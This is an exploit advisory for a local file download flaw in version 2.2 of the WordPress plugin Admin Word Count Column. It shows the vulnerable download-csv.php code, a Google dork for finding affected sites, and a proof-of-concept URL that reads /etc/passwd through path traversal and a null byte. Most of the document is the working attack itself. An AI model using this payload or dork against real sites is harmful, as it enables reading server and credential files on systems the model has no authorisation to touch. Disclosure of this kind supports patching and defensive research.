WordPress Admin Word Count Column plugin version 2.2 suffers from a file download vulnerability.
73ac9c17d2e4b0c8db61f5e81a1a2e82
# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local
File Download
# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/
# Date: 27-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage:
https://wordpress.org/plugins/admin-word-count-column/
<https://wordpress.org/plugins/video-synchro-pdf/>
# Version: 2.2
# Contact me: h [at] spidersilk.com
# PHP version: 5.3.2 or below
# Vulnerable File: plugins/admin-word-count-column/download-csv.php
# Vulnerable Code:
```
<?php
date_default_timezone_set('America/Los_Angeles');
$csvdate = date('Md-H-i-s-T');
$csvname = 'wordcounts-' . $csvdate . '.csv';
header('Content-Type: application/csv');
header('Content-Disposition: attachment; filename=' . $csvname);
header('Pragma: no-cache');
readfile($_GET['path'] . 'cpwc.csv');
?>
```
# Proof of Concept:
localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0
Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.